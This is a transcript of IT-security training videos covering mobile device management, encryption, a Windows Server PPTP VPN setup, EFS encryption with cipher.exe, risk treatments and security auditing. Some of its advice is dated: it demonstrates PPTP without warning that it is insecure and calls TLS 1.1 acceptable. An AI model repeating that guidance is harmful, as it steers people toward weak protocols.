Well, we always have different customers in and we don't know what the MAC addresses are ahead of time.
So MAC address whitelisting doesn't make sense. But what would make sense in that aspect for those mobile
devices is to have a guest-isolated network that has no connectivity to the production network at that car
dealership. We can also configure a mobile device settings using our centralized mobile device management
tool. And that way, we don't have to run around and configure these security settings one by one in every
device. So if things like turning off the microphone or the camera or maybe disabling GPS location services on
the device.
Enabling device encryption or remote wipe should the device be lost or stolen, and we want to remove any
sensitive data from it. We can also schedule malware engine and definition updates, and again, that is not
really specific to mobile devices. Same thing would be applicable to servers, to desktops, to laptops, to really
any operating system, whether it be physical or virtual. Any type of device should always have malware
definition protection on it. However, what is important is that we bear in mind that for smartphones, a lot of
people don't really think of them as computers and as such there might not be an anti-virus solution installed
on it. It's absolutely crucial because there is plenty of malware for smartphones. Remember, there are more
smartphone users around the world than any other type of device, so certainly the bad guys are focusing on
that.
So we can schedule malware scans. We can also restrict the ability of users to install mobile device apps. Or
we might have a very limited list of mobile device apps that users are allowed to install, trusted business apps.
We can also centrally configure password and authentication settings to make it harder for malicious users to
crack into a stolen smartphone, for example. We should also have a way to gather centralized inventory in
terms of hardware. So the types of devices we have and their details along with the software installed in all the
devices. This way, at any point in time, we might be able to detect any anomalies in terms of software that is
installed on devices that isn't licensed or might present a security risk to the organization.
Objectives
[Video description begins] Topic title: Data Confidentiality. The presenter is Dan Lachance. [Video
description ends]
Data confidentiality has always been a big deal, and certainly it's one of the focal points of cybersecurity.
However, these days, where we have so many devices interconnected over the Internet, data confidentiality is
even more relevant than it ever has been. So data confidentiality really means that we're going to protect
sensitive data through encryption. The original source data is called plain text. After the data is encrypted or
scrambled, it's called cipher text. Let's take a look at the encryption process. So we start with plain text. In this
example, it simply says The quick brown fox. Let's assume that that is sensitive information that we want to
protect. So what we would then do is take that plain text and feed it into an encryption algorithm with a key,
which results in cipher text. In other words, the encrypted data or the scrambled data.
Now, an encryption algorithm is really a mathematical function, and we'll talk about keys. Keys can either be
unique or not. And the key is part of what is used as the mathematical code that is fed into the algorithm to
result in that unique cipher text. Of course, decryption happens in the opposite direction given that we have the
correct decryption key. Symmetric encryption is a type of encryption where only one unique key is used. It
gets called a secret key because there is only one, and it can encrypt and it can also decrypt. So this secret key
then has a couple of problems, one of which is how can we securely distribute this secret key over a network?
Especially on large scale such as over the Internet. That is a problem. Secondly, if the key is compromised,
then all encrypted data encrypted by that key, is then also compromised, it can be decrypted.
Talk about having all of your eggs in one basket. So symmetric encryption does have its place when it's used in
conjunction with asymmetric encryption. Asymmetric encryption, as the name implies, uses two unique yet
different, or mathematically related in this case, keys, a public key and a private key. And when we talk about
asymmetric encryption, you'll also often hear it referred to as public key encryption. Now, securely distributing
the public key isn't a problem, that is why it's called a public key. You can give it to anybody and there is no
security risk. But of course, the private key is private to the user device or software to which it was issued, and
it must be kept safe.
Often public and private keys are the result of issuing a PKI security certificate to an entity. So the thing to
bear in mind is that when we need to encrypt something using asymmetric encryption, the target's public key is
what is used to encrypt a message. So if I'm sending an encrypted email message to you, I would need your
public key to encrypt the message for you. Now, the target's private key is what is used to decrypt the message.
So in our example to continue it, you would use your mathematically related private key to decrypt the
message that was encrypted with your related public key.
Now, encryption can be applied to data at rest, data that is being stored on storage media. Examples include
things like Microsoft BitLocker which is built into some Windows editions such as Windows 10 Enterprise.
And it allows the encryption of entire disk volumes. We've also got Microsoft Encrypting File System, EFS,
which is different than BitLocker because you can cherry pick the files and folders that you want to encrypt.
And it's tied to the user account where BitLocker is tied to the machine. Depending on a cloud provider we
might be using, like Microsoft Azure or Amazon Web Services or Google Cloud and so on, we also have
options for server side encryption when we store our data in the cloud.
But we can also encrypt data as it's being transmitted over the network, and there are many ways to do this,
such as using a VPN, a virtual private network. This allows a user that is working remotely to have an
encrypted connection over the Internet to a private network elsewhere, such as at work. Encrypting data using
Hypertext Transfer Protocol Secure, HTTPS, is everywhere, it's used all the time. And in order for this to
work, the web server needs to have been issued a PKI security certificate. I'm not going to call it an SSL or
TLS certificate, because SSL and TLS are really methods of exchanging keys over a network. They're really
not tied to the certificate itself.
So I can use a PKI certificate on a web server that is configured for SSL, which shouldn't be done because SSL
is not secure and is deprecated. I could use the exact same certificate, though, just as an example, on a different
web server configured for TLS. Now, as long as the server has the correct name or IP address that is in the
certificate, it would work fine. So the certificate is not tied to SSL or TLS. These are protocol settings that are
configured on the server as well as on the web browser side of the connection.
Now, we can also secure data in transit when we are remotely administering network devices like routers or
switches or printers or Unix or Linux hosts, or even Windows machines, if we install an SSH daemon on it.
We can use Secure Shell to do that, SSH. Secure Shell is an encrypted connection over a network that is
designed to do we just described, to perform remote administration at the command line level.
Objectives
We've talked about protecting data at rest and also protecting data in motion. Now it's time to see how to
actually do that. Specifically, protecting data in motion. We're going to set up a very simple VPN environment
here on Microsoft Windows Server 2016. Which would allow users working remotely to establish an
encrypted VPN tunnel over the Internet. So that everything they send over the Internet to the private network
here at work is encrypted, it's protected. To get started here in server 2016, I'm going to go to my Start menu,
and I'm going to fire up the Server Manager. Because I need to make sure the appropriate component or role
services are installed before I go and configure a VPN. So I'm going to click Add roles and features,
[Video description begins] The Server Manager - Dashboard window is open. It is divided into three parts.
The first part includes four menus: Manage, Tools, View, and Help. The second part includes Dashboard,
Local Server, All Servers, and IIS options. The Dashboard option is selected. The third part includes different
sections. The WELCOME TO SERVER MANAGER section includes a box. The box is divided into two parts.
The first part contains three options: QUICK START, WHAT'S NEW, and LEARN MORE. The QUICK START
option is selected and its contents are displayed in the second part. It contains Configure this local server, Add
roles and features, Add other servers to manage, Create a server group, and Connect this server to cloud
services links. The ROLES AND SERVER GROUPS section includes AD DS, DNS, and File and Storage
Services tiles. [Video description ends]
[Video description begins] The Add Roles and Features Wizard opens. It is divided into two parts. The first
part contains Before You Begin, Installation Type, Server Selection, Server Roles, Features, Confirmation, and
Results options. The second part displays the contents corresponding to the option in the first part. The wizard
also includes four buttons: Previous, Next, Install, and Cancel. The Before You Begin option is
selected. [Video description ends]
since I know I want to install something on the local server from where I'm running this.
[Video description begins] He clicks the Next button and the Installation Type page opens. He clicks the Next
button and the Server Location page opens. He clicks the Next button and the Server Roles page opens.The
page includes Roles and Description of the selected role. Roles includes Active Directory Certificate Services,
DHCP Server, File and Storage Services (3 of 12 installed), and Remote Access checkboxes. [Video
description ends]
And I'm interested here in the Remote Access side of things on the server, the Remote Access role. I'm going
to go ahead and turn that on.
[Video description begins] He selects the Remote Access checkbox and the corresponding description
displays. [Video description ends]
After a moment, it'll turn on the check mark. Over on the right I can see it's describing that it allows things like
DirectAccess, VPN, Web Application Proxy.
[Video description begins] He points to the description of the Remote Access checkbox. [Video description
ends]
So we want the VPN aspect, so I'm going to go ahead and click Next. I don't want to be featured so I'll just
proceed beyond this.
[Video description begins] The Select features page opens. It includes Features and the Description of the
selected feature. Features includes .NET Framework 3.5 Features (1 of 3 installed), .NET Framework 4.6
Features (4 of 7 installed), BitLocker Drive Encryption, and Group Policy Management (Installed)
checkboxes. [Video description ends]
[Video description begins] He clicks the Next button and the Remote Access page opens. He clicks the Next
button and the Select role services page opens. It includes Role services and the Description of selected role
service. Role services contains three checkboxes: DirectAccess and VPN (RAS), Routing, and Web Application
Proxy. [Video description ends]
DirectAccess and VPN (RAS) because that is what I want. I'm going to add the features for management tools
[Video description begins] The Add Roles and Features Wizard opens. It includes Include management tools
(if applicable) checkbox and Add Features and Cancel buttons. [Video description ends]
and I will proceed again by clicking, Next and then finally, Install.
[Video description begins] He clicks the Add Features button and the Add Roles and Features Wizard
closes. [Video description ends]
[Video description begins] He clicks the Next button and the Confirm installation selections page opens. He
clicks the Install button and the Installation progress page opens. [Video description ends]
We wait for this to be installed before we can begin configuring our server side VPN. Okay, before too long
the installation will be completed. So I'm going to go ahead and click Close.
[Video description begins] The Add Roles and Features Wizard closes. [Video description ends]
Then here in the Server Manager tool, I'll go to the Tools menu so we can start configuring this. I'm interested
in the Remote Access Management tool. Now in here, I can configure a VPN among other things like direct
access or the web application proxy, and so on.
[Video description begins] The Remote Access Management Console window opens. It is divided into three
parts. The first part is the navigation pane, which includes the Configuration and Srv2016-1 options. The
Configuration option includes DirectAccess and VPN sub option. The second part is the content pane. The
third part is the Tasks pane, which includes the General option. It further includes Manage a Remote Server
and Refresh Installed Roles sub options. [Video description ends]
I can also configure my VPN in the routing and remote access tool as well. So if I were to let's say to minimize
this and go back into Tools, I also have a Routing and Remote Access tool. Now this is an older version that
truly you might already be familiar with if you've got experience with previous versions of the Windows
Server operating system. I'm going to go ahead and use this one.
[Video description begins] The Routing and Remote Access window opens. It is divided into four parts. The
first part is the menu bar. The second part is the Toolbar. The third part contains the Routing and Remote
Access root node, which contains the Server Status and SRV2016-1 (local) options. The SRV2016-1 (local)
option is selected. The Welcome to Routing and Remote Access page is open in the fourth part. [Video
description ends]
So over on the left I can see my server name with a little red down-pointing arrow because running on remote
access has not yet been configured. And we are going to configure a VPN here, so I'm going to right-click and
choose Configure and Enable Routing and Remote Access.
[Video description begins] The Routing and Remote Access Server Setup Wizard opens. [Video description
ends]
[Video description begins] The Configuration page opens. It contains five radio buttons: Remote access (dial-
up or VPN), Network address translation (NAT), Virtual private network (VPN) access and NAT, Secure
connection between two private networks, and Custom configuration. [Video description ends]
Now, normally, you would have at least two network cards in your VPN host, whether it's physical or virtual.
One network card connected to a public-facing network that is reachable from the Internet, that users would
connect to to establish the VPN tunnel. And the second card, and maybe more than just two cards, would
connect to internal networks to allow that connectivity. So here I've only got one network card, so to proceed
with this example, to configure the VPN, I'm going to have to choose Custom configuration here in the wizard,
instead of Remote access (dial-up or VPN). So having done that, I'll click Next. I'm going to turn on VPN
access.
[Video description begins] The Custom Configuration page opens. It contains five checkboxes: VPN access,
Dial-up access, Demand-dial connections (used for branch office routing), NAT, and LAN routing. [Video
description ends]
[Video description begins] The Completing the Routing and Remote Access Server Setup Wizard page
opens. [Video description ends]
Now what I've done at this point is configured a PPTP, or a Point to Point Tunneling Protocol VPN.
[Video description begins] He clicks the finish button and the Routing and Remote Access dialog box opens. It
contains Start service and Cancel buttons. [Video description ends]
There are many other types of VPNs, like SSL VPNs, which require a PKI certificate. We could also have
configured a layer two tunneling protocol VPN, and so on. So here I am just going to click Start service to get
this up and running.
[Video description begins] The Routing and Remote Access dialog box closes. [Video description ends]
The only other thing I really should do is determine which IP addresses I want to hand out to VPN clients.
[Video description begins] The Routing and Remote Access Server Setup Wizard closes. [Video description
ends]
So for that I am going to right-click on my server in the left-hand navigator and I am going to go into
Properties, IPv4.
[Video description begins] The SRV2016-1 (local) Properties dialog box opens. It contains seven tabs:
General, Security, IPv4, IPv6, IKEv2, PPP, and Logging. He selects the IPv4 tab. It includes Enable IPv4
Forwarding checkbox, which is selected. It also includes the IPv4 address assignment section, which further
includes Dynamic Host Configuration Protocol (DHCP) and Static address pool radio buttons. This section
also includes a table with five column headers: From, To, Number, IP Addresses, and Mask and Add, Edit,
and Remove buttons. The IPv4 tab also includes Enable broadcast name resolution checkbox and Adapter
drop-down list box. Allow RAS to select adapter option is selected in the Adapter drop-down list box. [Video
description ends]
And what I want to do is use a Static address pool for VPN clients, I'll click Add. Let's say, I want to give them
an address starting at 1.1.1.1
[Video description begins] He selects the Static address pool radio button and clicks the Add button. The New
IPv4 Address Range dialog box opens. It contains Start IP address, End IP address, and Number of addresses
fields and OK and Cancel buttons. [Video description ends]
through to 1.1.1.50. That way I have a unique range that identifies VPN clients if I happen to be taking a look
on the network and seeing which devices are on the network.
[Video description begins] He enters the values 1.1.1.1 and 1.1.1.50 in the Start IP address and End IP
address fields, respectively. The Number of addresses field displays the value 50. [Video description ends]
[Video description begins] The New IPv4 Address Range dialog box closes. [Video description ends]
The other thing to watch out for is to make sure that users that will be authenticating to the VPN are allowed to
do that.
[Video description begins] The SRV2016-1 (local) Properties dialog box closes. [Video description ends]
So here in the Windows world I'm going to go back to my Start menu. I've got Microsoft Active Directory
configured, so I'm going to go ahead and start the Active Directory Users and Computers tool. Because in here
is one way that I can enable remote access to make sure that users are allowed to establish a VPN connection.
So here I've got a user called User One.
[Video description begins] The Active Directory Users and Computers window opens. It is divided into four
parts. The first part is the menu bar. The second part is the Toolbar. The third part contains the Active
Directory Users and Computers root node. It contains two nodes, Saved Queries and fakedomain1.local. The
fakedomain1.local is expanded and it includes Admins, Computers, and LasVegas subnodes. The LasVegas
subnode further contains Computers and Groups subnodes and Users folder. A table with Name, Type, and
Description column headers and one row is displayed in the fourth part. The values User One and User are
displayed under the Name and Type column headers. [Video description ends]
So I'm just going to right-click and go over to the Properties for that account. And what I'm really interested in
here is the Dial-in tab.
[Video description begins] The User One Properties dialog box opens. It includes General, Address, Account,
and Profile tabs. The General tab is selected. It includes First name, Initials, Last name, and Display name
text boxes. [Video description ends]
I want to make sure that Network Access Permission is allowed.
[Video description begins] He clicks the Dial-in tab. The Dial-in tab is divided into four sections: Network
Access Permission, Callback Options, Assign Static IP Addresses, and Apply Static Routes. The Network
Access Permission section includes Allow access, Deny access, and Control access through NPS Network
Policy radio buttons. The Callback Options include No Callback, Set by Caller (Routing and Remote Access
Service only), and Always Callback to radio buttons and a text box adjacent to the Always Callback to radio
button. [Video description ends]
Notice here it could be denied and we can also control it through a network policy. As opposed to having to do
it here within each individual user account, but at this level, notice in fact, that access is allowed. I'm going to
go ahead and click OK.
[Video description begins] The User One Properties dialog box closes. [Video description ends]
Next, I'll configure the client's side of the VPN connection here on Windows 10. Where the first thing I'll do is
go to my Start menu and search up Settings. Now I'm going to go on the Settings on my machine, then I'll go
into Network & Internet.
[Video description begins] The Windows Settings window opens. It includes Network & Internet, System,
Devices, and Accounts options. [Video description ends]
And I'm very interested in creating a new connection, so I'll start by clicking Change adapter options.
[Video description begins] The Network & Internet page opens. It is divided into two parts. The first part
includes Home, Status, Wi-Fi, Ethernet, and VPN options and a Find a settings search box. The second part
displays the contents of the corresponding option in the first part. The Status option is selected and its content
is displayed in the second part. It includes different sections. The Change your network settings section
contains three options: Change adapter options, Sharing options, and Network troubleshooter. It also includes
Network and Sharing Center and Windows Firewall links. [Video description ends]
Here we can see any network adaptors that are configured on this machine.
[Video description begins] The Network Connections window opens. It includes Bluetooth Network
Connection, Ethernet, Ethernet 2, and Wi-Fi options. [Video description ends]
Well when you configure a VPN, you're going to be end up configuring a new adapter that shows up here, a
logical adapter. So the next thing I'll do here on Windows 10 is add a new network connection.
[Video description begins] He closes the Network Connections window. [Video description ends]
So to do that I'm going to go to the Network and Sharing Center, and I'm going to choose Set up a new
connection or network.
[Video description begins] The Network and Sharing Center window opens. It is divided into two parts. The
first part includes Control Panel Home, Change adapter settings, Media streaming options, Infrared, and
Internet Options links. The second part is divided into two sections. The first section is the View your active
networks and the second section is the Change your networking settings. The Change your networking settings
contains Set up a new connection or network and Troubleshoot problems links. [Video description ends]
I'm going to use my Internet connection, you need to be on the Internet to establish a VPN link to the public
interface of the VPN host.
[Video description begins] The Connect to a Workplace wizard opens. It includes two options: Use my Internet
connection (VPN) and Dial directly. It also includes Cancel button. [Video description ends]
So now I have to specify the address or name that resolves to an IP address of that host.
[Video description begins] He selects the Use my Internet connection (VPN) option. The Type the Internet
address to connect to page opens. It includes Internet address and Destination name text boxes and Use a
smart card, Remember my credentials, and Allow other people to use this connection checkboxes. The
Destination name text box displays the value VPN Connection. The Remember my credentials checkbox is
selected. It also includes Create and Cancel buttons. [Video description ends]
So I've popped in the IP address of that VPN server. I'm going to leave the Destination name here just called
VPN Connection.
[Video description begins] He enters the value 192.168.0.231 in the Internet address text box. [Video
description ends]
I'm not using a smart card for authentication although that is a great way to further secure your environment.
[Video description begins] He unchecks the Remember my credentials checkbox. [Video description ends]
And I certainly don't want to remember my credentials and I'll just click Create.
[Video description begins] The Type the Internet address to connect to page closes. [Video description ends]
So if we were to go back and look at our adapters, we're going to see that we've now got that virtual adapter I
was talking about.
[Video description begins] He clicks the Change adapter settings link and the Network Connections window
opens again. [Video description ends]
It's called VPN Connection, because that is what we named it. And we're currently disconnected, so we're
going to go ahead and right-click and go into the Properties.
[Video description begins] He points to the VPN Connection option. [Video description ends]
Because one of the things I want to do under Security is specify that we're using a Point to Point Tunneling
Protocol (PPTP), VPN. And then I'm going to right-click and choose connect on that adapter.
[Video description begins] The VPN Connection Properties dialog box opens. It contains five tabs: General,
Options, Security, Networking, and Sharing. He clicks the Security tab and it includes Type of VPN and Data
encryption drop-down list boxes. He clicks the Type of VPN drop-down list and selects the Point to Point
Tunneling Protocol (PPTP) option. He clicks the OK button and the VPN Connection Properties dialog box
closes. [Video description ends]
And I'm going to select the VPN Connection and choose Connect.
[Video description begins] He right-clicks the VPN Connection option in the Network Connections window
and a panel appears, which includes Npcap Loopback Adapter, VPN Connection, and ARRIS-17BB-Basement
options. [Video description ends]
So at this point it's asking me for credentials, so I'm going to go ahead and specify let's say user one's name and
password.
[Video description begins] The Sign in dialog box opens. It contains User name and Password text boxes and
OK and Cancel buttons. [Video description ends]
And once I've done that we can see that we now have a valid connection.
[Video description begins] He enters the value Uone in the User name text box. [Video description ends]
Well, if I just take a look here at the status when I right-click on it, we could see that we've got some
information being transmitted through this VPN connection.
[Video description begins] He points to the VPN Connection option. [Video description ends]
And from a Command Prompt, if I were to type ipconfig, we would see that we've got our VPN connection
listed here.
[Video description begins] He right-clicks the VPN Connection option and clicks the Status option. The VPN
Connection Status dialog box opens. It contains two tabs, General and Details. The General tab is selected. It
is divided into two sections, Connection and Activity, which display information about the VPN
connection. [Video description ends]
[Video description begins] He opens the Command Prompt window. It displays the C:\Users\danla>
prompt. [Video description ends]
Right here, VPN connection listed as another adapter with an IP address within the space that we configured.
[Video description begins] He points to the PPP adapter VPN Connection and 1.1.1.2 IPv4 address in the
command prompt window. [Video description ends]
[Video description begins] Topic title: Implement Encryption for Data at Rest. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll implement encryption for data at rest. And I'll be using Microsoft Encrypting File
System, or EFS, to do it. EFS is a part of the Windows operating system, but you won't find it in some editions
of Windows client operating systems, like Windows 10 Home. However, here on my Windows server, I've got
some sample files, and I want to encrypt one of them.
[Video description begins] The File Explorer window is open. It is divided into two parts. The first part is the
navigation pane and it includes Downloads and Documents options and Logs and 2017_Patients folders. The
second part contains four files: PHI_Automation_Test.txt, PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-
008.xls, and PHI-YHZ-004-0456-009.xls. [Video description ends]
What I'm going to do is right-click on the file I want to encrypt and choose Properties.
[Video description begins] He right-clicks the PHI-YHZ-004-0456-009.xls file, a shortcut menu appears and
he selects the Properties option. The PHI-YHZ-004-0456-009.xls Properties dialog box opens. It contains five
tabs: General, Classification, Security, Details, and Previous Versions. The General tab is selected and it
displays information about the PHI-YHZ-004-0456-009.xls file, which includes Type of file, Location, Size on
disk, and Created. It also includes two Attributes checkboxes, Read-only and Hidden. It also includes
Advanced, OK, Cancel, and Apply buttons. [Video description ends]
From here, I can go to the Advanced button, and in the Advanced Attributes down at the bottom, I can choose
to either compress or encrypt the file, not both.
[Video description begins] The Advanced Attributes dialog box opens. It is divided in two sections, File
attributes and Compress or Encrypt attributes and it includes OK and Cancel buttons. The File attributes
section contains two checkboxes, File is ready for archiving and Allow this file to have contents indexed in
addition to file properties. Both the checkboxes are checked. The Compress or Encrypt attributes section
contains two checkboxes, Compress contents to save disk space and Encrypt contents to secure data and
Details button. [Video description ends]
I'm going to choose Encrypt contents to secure data, and I'll click OK twice.
[Video description begins] He clicks OK and the Advanced Attributes dialog box closes. He again clicks OK
and the PHI-YHZ-004-0456-009.xls Properties dialog box closes. [Video description ends]
After a moment, we should be able to see that we've got a tiny golden padlock icon on that file icon, which
implies that the file is in fact encrypted. Now it's encrypted and tied to the user that's currently logged in.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file. [Video description ends]
So I'm going to fire up the Start menu here on my machine, and I'm going to type certmgr.msc. That will start
the certificate manager Microsoft console built in to Windows. Now when I do that, I can examine my
certificates.
[Video description begins] The certmgr – [Certificates – Current User] window opens. It is divided into three
parts. The first part is the Toolbar. The second part contains the Certificates – Current User root node, which
includes Personal, Enterprise Trust, Trusted People, and Other People nodes. The third part displays the
contents of the option selected in the second part. [Video description ends]
Now what does that have to do with EFS? Well, if you didn't already have a certificate prior to encrypting your
first file with EFS, the operating system will make one for you. So it will be here under Personal>Certificates.
[Video description begins] He clicks the Certificates folder under the Personal node and a table is displayed
in the third part. The table includes Issued To, Issued By, Expiration Date, Intended Purposes, and Friendly
Name column headers and two rows. The values Administrator, Administrator, 10/15/2116, File Recovery,
and <None> are displayed in the first row and values Administrator, Administrator, 11/12/2118, Encrypting
File System, and <None> are displayed in the second row under the Issued To, Issued By, Expiration Date,
Intended Purposes, and Friendly Name column headers, respectively. [Video description ends]
Now this is for the current user, as we can see. And notice that I've got an encrypting file system, or EFS
certificate here, issued to user Administrator, which is who I'm currently logged in as. I can just pop that up by
double-clicking if I want to see any further details on any of these. What I'm interested in looking at here, is
looking at the validity date.
[Video description begins] He double-clicks the Administrator value in the second row under the Issued To
column header and the Certificate dialog box opens. It contains three tabs: General, Details, and Certification
Path. The General tab is selected and it displays the Certificate Information. It also includes the Issuer
Statement button. [Video description ends]
[Video description begins] He points to the information: Valid from 12/6/2018 to 11/12/2118. [Video
description ends]
And in this case, it tells me I've got a private key that corresponds to the certificate as well.
[Video description begins] He clicks the OK button and the Certificate dialog box closes. [Video description
ends]
Here in the Windows command line, we can also use the cipher executable program to work with encrypted
files related to EFS.
[Video description begins] He opens the Select Administrator: Command Prompt window. It displays the C:\
Data\Sample_Data_Files\PHI\2017_Patients> prompt. [Video description ends]
So here, I've navigated to where those sample files are. And if I type dir, indeed, I can see the files that we
were working with.
[Video description begins] He executes the following command: dir. The output includes the following file
names: PHI-YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls, and PHI-YHZ-004-0456-009.xls. [Video
description ends]
And as a matter of fact, if I flip over to Windows Explorer, there is our encrypted file. It's got a 009 towards
the end of the file name.
[Video description begins] He switches to the File Explorer window and points to the PHI-YHZ-004-0456-
009.xls file. [Video description ends]
So let's go back to the Command Prompt, and indeed, we do see the 009 file, but we don't know if it's
encrypted or not, not using dir we don't.
[Video description begins] He points to the PHI-YHZ-004-0456-009.xls file in the output. [Video description
ends]
[Video description begins] He executes the following command:cls. [Video description ends]
Now, the great thing about knowing how to do things at the command line is that you can automate this.
[Video description begins] He executes the following command: cipher. The output lists four files and indicate
whether they are encrypted or unencrypted. The file PHI-YHZ-004-0456-009.xls is encrypted and filesPHI-
YHZ-004-0456-007.xls, PHI-YHZ-004-0456-008.xls and PHI_Automation_Test.txt are unencrypted. [Video
description ends]
What if you had to take a look at the encryption state of many different files across many servers and different
folders and, well, you could write a script pretty quickly that would do that. Here when we look at the output
of the cipher command, U means unencrypted, E means encrypted. Indeed, we can see our 009 file in fact is
encrypted.
I could also decrypt it right here at the command line. So instead of doing it the GUI and right-clicking and
going into properties, I could also do cipher /d for decrypt and in this case, I put in the file name of that entry.
And after that, we would be on our way. So I'm going to go ahead and specify the file name, in this case, 009.
Okay, so it says decrypting it, let's just clear the screen, let's run cipher again.
[Video description begins] He executes the following command: cipher /dPHI-YHZ-004-0456-009.xls. [Video
description ends]
And yeah, we can now see that it's got a U in front of it because now it's not encrypted, it's unencrypted.
[Video description begins] He executes the following command: cipher and in the output, he points to the PHI-
YHZ-004-0456-009.xls file which is encrypted. [Video description ends]
Now let's go back into the GUI for a minute in Windows Explorer because let's say, I right-click on the folder
containing those sample files and go into Properties, go into Advanced. Well, I've already flagged encryption
at the folder level.
[Video description begins] He right-clicks the 2017_Patients folder in the first part of the File Explorer
window. A shortcut menu appears. He selects the Properties option and the 2017_Patients Properties dialog
box opens. It includes General, Sharing, and Security tabs. Under the General tab, he clicks the Advanced
button and the Advanced Attributes dialog box opens. It contains two sections, Archive and Index attributes
and Compress or Encrypt attributes and OK and Cancel buttons. The Archive and Index attributes section
contains two checkboxes, Folder is ready for archiving and Allow files in this folder to have contents indexed
in addition to file properties. Both the checkboxes are checked. The Compress or Encrypt attributes section
contains two checkboxes, Compress contents to save disk space and Encrypt contents to secure data and
Details button. The Encrypt contents to secure data checkbox is checked. [Video description ends]
Now when you do that initially, it'll ask you if you want to encrypt what is already in the folder. But in the
future, newly added files should be encrypted automatically. Let's see if that is true.
[Video description begins] He clicks the Cancel button and the Advanced Attributes dialog box closes. He
clicks the Cancel button and the 2017_Patients Properties dialog box closes. [Video description ends]
I'm going to right-click here in this folder and create a new file called new. And I can tell already, it's
encrypted, we can see the little gold padlock icon.
[Video description begins] He right-clicks and a menu appears. He hovers over the New option and a flyout
menu appears. He clicks the Text Document option from the flyout menu and a text box appears. He names it
new. [Video description ends]
And of course, we could verify this at the command line by simply typing, cipher. And indeed, our new
encrypted file is listed.
[Video description begins] He switches to the Administrator: Command Prompt window and executes the
following command: cipher. In the output, he points to the new.txt file which is encrypted. [Video description
ends]
Objectives
[Video description begins] Topic title: Exercise: Session Management and Encryption. The presenter is Dan
Lachance. [Video description ends]
In this exercise, you will first describe three common risk treatments related to risk management, and provide
an example of each. After that, you'll describe HTTP session management. Next, you'll explain how encrypting
files on many servers using Microsoft Encrypting File System, or EFS, can be automated. Finally, the last
thing you'll do is explain the relationship between PKI certificates and SSL/TLS. Pause the video, think about
these things carefully, and then come back to view the solutions.
In risk management there are a number of different risk treatments, ways to manage that risk. One of which is
risk mitigation. Risk mitigation would apply when you implement a security control to either reduce, or
eliminate, the risk. Such as putting a firewall in place to reduce the risk of incoming malicious traffic initiated
from outside the network. Risk avoidance is another risk treatment. What this means is that we do not partake
in a specific activity because the risk is too high compared to the possible rewards. So we completely avoid it
in the first place.
Risk transfer means you are outsourcing the risk to a third-party, and one way that happens is through
insurance, such as through cyber liability insurance. For example if you deal with customer data and that data
is hacked and people's sensitive information is then used for identity theft and so on. You could pay a monthly
premium and transfer that type of risk to a cyber liability insurance company.
HTTP is generally a stateless protocol. Certainly that is true with HTTP 1.0. After the web browser sends an
HTTP command to the server and the server fulfills it that is it. Session is done. Next time that same browser
does it to the server looks like a whole new connection from the servers' perspective unless using HTTP 2.
So HTTP is HyperText Transfer Protocol, we know that version 1 is considered stateless. And so to deal with
that we know that we have things like web browser cookies to retain information between connections from
the browser to the server. And that cookie might contain sensitive information like a session ID or some kind
of a security token that authorizes the user to use a secured website.
[Video description begins] Communication stops upon HTTP transaction completion. [Video description ends]
So the cookie data then, like a session ID, could be transmitted to web servers or future connections without
the user having to authenticate if the session hasn't yet timed out. How can we automate EFS file encryption?
We can use the GUI and right-click on files and folders and go into the properties to enable encryption. But
otherwise, we could automate this by building a script. And that script, among other things, would use the
cipher.exe command that is built into Windows OS's that support EFS.
Now the Cipher command by itself will simply list files and directories in the file system in the current
location. Preceded by either a U if the entry is unencrypted or E if it's encrypted. And to encrypt something, we
want to do that in our script, we can do Cipher /e for encrypt, and then specify what it is it that needs to be
encrypted, such as a file name. And, inversely, we can decrypt using Cipher /d. The thing to watch out for
though is if you're going to do this across a bunch of machines, understand that EFS encryption encrypts the
file for the user that is logged on doing the encryption.
So, you can add other parodies that should have the ability to decrypt, but this is the default behavior, so just
bare it in mind. The next thing we'll do is distinguish the difference, and the relationship also, between PKI,
SSL, and TLS. PKI, or public key infrastructure, really is a hierarchy of digital security certificates, that are
issued to users, devices or even software applications. And among other things the certificate, it's used for
security, but it contains a public key, and possibly a mathematically related private key. And these are used for
encryption and decryption and the creation of digital signatures, and all that great stuff that secures a
connection over the network.
Now SSL is a security protocol. So when people say SSL certificate, well, it’s almost like a misnomer. A PKI
certificate can be used for SSL or TLS or both at the same time. So we don't really want to call it, technically,
an SSL or a TLS certificate, SSL is a security protocol. However, it's considered vulnerable and deprecated, so
we should try not to use it if we don't have to. TLS, or Transport Layer Security, can be used. It supersedes
SSL. Now you don't want to use TLS 1.0, because there are known vulnerabilities. If you can help it, don't use
it. But try to use version 1.1 and above. Again, TLS is a security protocol where, for example, a web browser
connecting to a server will negotiate the highest level of TLS that is supported by both ends to deal with key
exchange and so on.
Table of Contents
No Objective Provided
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993. Including as a technical trainer with Global
Knowledge, programmer consultant, as well as an IT tech author and editor for McGraw-Hill and Wiley
publishing. He has held and still holds certifications in Linux, Novell, Lotus, CompTIA, and Microsoft. His
specialities over the years have included networking, IT security, cloud solutions, Linux management, and
configuration and troubleshooting across a wide array of Microsoft products. Most end users have a general
sense of IT security concepts.
But today's IT systems are growing ever larger and more complex. So now more than ever, it's imperative to
have a clear understanding of what digital assets are and how to deal with security threats and vulnerabilities.
Users need to acquire the skills and knowledge to apply security mitigations at the organizational level. In this
course, Dan Lachance will use selective auditing to provide valuable insights to activity on a network. He'll
also cover how incident response plans are proactive measures used to deal with negative events. Specifically,
learners will explore how to apply IT security skills to enable asset usage auditing and create incidence
response plans.
After completing this video, you will be able to list best practices related to IT security auditing.
Objectives
Periodic security audits can ensure that IT systems, business processes, and data are protected properly and
that privileges are not being abused.
So we can track resource usage, where resources could be things like files, databases, applications, secured
devices, user accounts, and even changes made to privileges for access to these resources. There are usually a
number of driving factors that will push an organization to conducting periodic security audits.
One of which is legal and regulatory compliance. For example, to remain in compliance with HIPAA
regulations related to protection of sensitive medical information, certain types of security controls need to be
in place. And this can be determined through conducting periodic security audits. And the same thing would be
true for other bodies like PCI DSS, which is used for merchants that work with cardholder data, the proper
protection of that type of sensitive information.
Another driving factor would be to ensure continued customer confidence in the organization. We should also
establish an annual security baseline because if we don't do that when we periodically conduct a security audit,
we might not know what is secure or what is not, compared to what is normal within the specific organization.
Also, we can use auditing to measure incident response effectiveness as we audit how incidents are dealt with.
